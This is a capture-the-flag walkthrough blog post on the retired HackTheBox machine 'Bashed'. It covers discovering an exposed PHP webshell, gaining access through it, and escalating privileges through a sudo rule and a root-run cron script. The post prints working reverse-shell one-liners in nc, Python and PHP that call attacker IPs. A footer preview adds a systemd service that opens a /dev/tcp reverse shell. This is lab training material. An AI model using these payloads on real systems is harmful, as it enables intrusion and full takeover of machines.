Skip to main content

HacktheBox - bashed - Retired - Update

HacktheBox - bashed - Retired - Update





Recon


I've been using threader3000 to do my recon scan lately. It does a super fast up/down scan on all TCP ports, then suggests an nmap scan to run based on just the open ports found on the first scan. It also saves the nmap results as a XML, which I then convert to HTML to make it pretty.


xsltproc ./bashed.htb/bashed.htb.xml -o ./bashed.html



Just one open port, port 80


Nmap says it's Apache 2.4.18, and it's likely an Ubuntu box.


Let's see what we is being shown to us when we browse to the site.



Phpbash?

A quick google search lands us on this github

https://github.com/Arrexel/phpbash


It's a php webshell, and the author says

"I actually developed it on this exact server"





And it looks like the author of the github is also the person who made this box. Arrexel


I think that means there is a webshell somewhere on this server if we can find it.


I tried the name listed in the github to see if I could get to the webshell



Both were a 404 so it must be named something else or be in another directory.


So let's use dirb to see if we can find it.




There is are a couple of potential directories found by dirb… but let's start with /dev



Here are those php web shells we were looking for.



Let's look at a phpbash.php


Ok it looks like our webshell, let's try and use this to get a real reverse shell.





Exploit

Let's start up a nc listener on my kali box to see if we can catch a reverse shell.


nc -lnvp 5555



Then in the webshell let's try


nc 10.10.14.10 5555 -e /bin/sh




Well that didn't work this version of netcat doesn't let us use -e to send /bin/sh


Ok let's head over to payloadallthethings and see what other options we might have for reverse shell.


https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md


I next tried python which did get  me a shell…. But


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'




It's doubling every character I type… it still works and issues the right command but it's ugly and I don't like it.


Since this is a php web server it's likely that we can use php to get a reverse shell.


I restarted my listener.


php -r '$sock=fsockopen("10.10.14.10",5555);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'




Much better. Let's figure out escalation now.


From just poking around in the file system, I found we can already access the user.txt in the /home/arrexel directory.


We can also get in the /home/scriptmanager folder.


I used updog (https://github.com/sc0tfree/updog) to serve linpeas.sh to bashed.



Then gave execution rights to linpeas.sh


chmod +x ./linpeas.sh


Then I ran this script. This is local enumeration script that checks for passwords laying around, misconfigurations, and settings on the box.


Here is the first interesting thing I found in the results.




User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL


Www-data can run any command as scriptmanager with no password.


So we can use this to switch to the user scriptmanager.

sudo -u scriptmanager /bin/sh




We are now in as scriptmanager. There is a folder under / called scripts we were not able to access before. Let's see what is in there.



In here there are two files test.py and test.txt.


the contents of test.py are.

f = open("test.txt", "w")
f.write("testing 123!")
f.close


It opens a file named test.txt in the current directory and writes "testing 123!" to the file and then closes the file.


There is a file called test.txt here let's check its contents.


cat test.txt
testing 123!


But if we try to run the program we get this error since our root owns test.txt and our user only has read rights to the file.


python test.py
Traceback (most recent call last):
  File "test.py", line 1, in <module>
    f = open("test.txt", "w")
IOError: [Errno 13] Permission denied: 'test.txt'


What is strange here is that test.txt is owned by root


And it's got a recent modified time stamp…..


Like there might be a task running this test.py as root, fairly often.


I renamed  test.txt to test.bak and waited a minute to see if the file came back.


mv test.txt test.bak



It did



A couple minutes after the rename we have  a new test.txt created by root.


I think we are right in our guess, there is a process running as root that runs this test.py once every couple of minutes.



So if we could move test.py to test.py.bak and create a new python script that does something else we could elevate our privileges here.


So the super easy thing here is to do what I did the first time I did this box. To simply modify the test.py file to open /root/root.txt and write it to the test.txt file.


f = open("test.txt", "w")
f.write("testing 123!")
f.write("\n")
with open("/root/root.txt") as f1:
 for line in f1:
  f.write(line)
f.write("\n")
f.close



But this time I wanted a shell so I instead found a revers shell python script and modified it to work here.


I found this 


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



On the pentestmonkey's site

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


So since we are going to make a .py file we can remove the first bit because we aren't calling a python cmd to run but rather just the file.


I added in some returns to make it slightly easier to read for me 


import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.40.10",5566));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);



Then I setup a new listener


nc -lnvp 5566 



I used my updog connection to serve the file I named RShell.py


And used wget again to download the file.


.

Then just a couple more steps.

First let's save the current test.py by renaming it using move


mv test.py test.py.bak


Then rename our RShell.py to test.py using move again.


mv RShell.py test.py



Now we just set back and wait for root to run our newly modified python script.


And now we have a shell as root and grab our flag and do anything else we want with this box.



Here is the cron job that was running every minute.



I guess we didn't even need to have the same name for our python script it runs all python scripts in the /scripts directory every minute.








Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more